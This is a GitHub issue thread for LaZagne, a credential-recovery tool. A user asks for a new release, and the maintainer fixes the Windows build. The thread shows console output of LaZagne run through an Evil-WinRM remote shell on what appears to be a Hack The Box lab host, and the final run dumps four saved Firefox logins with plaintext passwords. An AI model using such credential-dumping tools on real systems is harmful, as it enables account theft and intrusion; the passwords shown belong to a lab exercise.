AlessandroZ / LaZagne

Credentials recovery project

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Creating a new release

Techbrunch opened this issue · comments


Could you create a new release with the latest changes ?

I was able to rebuild LaZagne using the Github action but it doesn't work (FYI I had to update .github/workflows/WinCompile.yml).

A lot of modules are not used due to missing depencies:

[-] Module Mozilla is not used due to unresolved dependence:

No module named 'pyasn1'
*Evil-WinRM* PS C:\Users\nikk37\Documents> .\LaZagne.exe all -v

|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |

########## User: nikk37 ##########

 ------------------- Pidgin passwords -----------------

[!] No passwords found
 ------------------- Ucbrowser passwords -----------------

[-] Module UCBrowser is not used due to unresolved dependence:

No module named 'Crypto'
[!] No passwords found

 ------------------- Thunderbird passwords -----------------

[-] Module Thunderbird is not used due to unresolved dependence:

No module named 'pyasn1'
[!] No passwords found

 ------------------- Iiscentralcertp passwords -----------------

[-] Module IISCentralCertP is not used due to unresolved dependence:

No module named 'rsa'
[!] No passwords found

 ------------------- Mremoteng passwords -----------------

[-] Module mRemoteNG is not used due to unresolved dependence:

No module named 'Crypto'
[!] No passwords found

 ------------------- Pypykatz passwords -----------------

[-] Module Pypykatz is not used due to unresolved dependence:

No module named 'pypykatz'
[!] No passwords found

 ------------------- Chromiumbased passwords -----------------

[-] Module ChromiumBased is not used due to unresolved dependence:

No module named 'Crypto'
[!] No passwords found

 ------------------- Mozilla passwords -----------------

[-] Module Mozilla is not used due to unresolved dependence:

No module named 'pyasn1'
[!] No passwords found
[!] No passwords found

[+] 0 passwords have been found.

elapsed time = 0.0625452995300293

Firefox is not listed as supported:

*Evil-WinRM* PS C:\Users\nikk37\Documents> .\LaZagne.exe browsers -h
usage: LaZagne.exe browsers [-h] [-v] [-quiet] [-ie] [-password PASSWORD]
                            [-oN] [-oJ] [-oA] [-output OUTPUT]

optional arguments:
  -h, --help          show this help message and exit
  -v                  increase verbosity level
  -quiet              quiet mode: nothing is printed to the output

Web browsers supported:
  -ie                 ie passwords

Windows User Password:
  -password PASSWORD  Windows user password (used to decrypt creds files)

  -oN                 output file in a readable format
  -oJ                 output file in a json format
  -oA                 output file in both format
  -output OUTPUT      destination path to store results (default:.)

Hi @Techbrunch,

Finally I have updated the Github action to allow the build. I have also pushed a new release. In your file the requirements.txt file was not found because by default it was looking on the Windows folder, so I changed it to ../requirements.txt.

Have a nice day.

Awesome I just tested it and it works like a charm !

*Evil-WinRM* PS C:\Users\nikk37\Documents> .\LaZagne.exe all

|                                                                    |
|                        The LaZagne Project                         |
|                                                                    |
|                          ! BANG BANG !                             |
|                                                                    |

########## User: nikk37 ##########

------------------- Firefox passwords -----------------

[+] Password found !!!
URL: https://slack.streamio.htb
Login: yoshihide
Password: paddpadd@12

[+] Password found !!!
URL: https://slack.streamio.htb
Login: nikk37
Password: n1kk1sd0p3t00:)

[+] Password found !!!
URL: https://slack.streamio.htb
Login: JDgodd
Password: password@12

[+] Password found !!!
URL: https://slack.streamio.htb
Login: admin
Password: JDg0dd1s@d0p3cr3@t0r

[+] 4 passwords have been found.
For more information launch it again with the -v option

elapsed time = 0.156264066696167